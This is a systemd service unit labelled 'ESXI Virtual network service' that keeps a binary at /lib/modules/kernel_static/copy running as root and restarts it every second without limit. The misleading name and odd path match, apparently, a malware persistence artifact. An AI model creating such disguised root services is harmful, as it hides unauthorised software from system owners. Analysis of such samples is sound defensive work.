[Unit]
Description=ESXI Virtual network service
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
ExecStart=/lib/modules/kernel_static/copy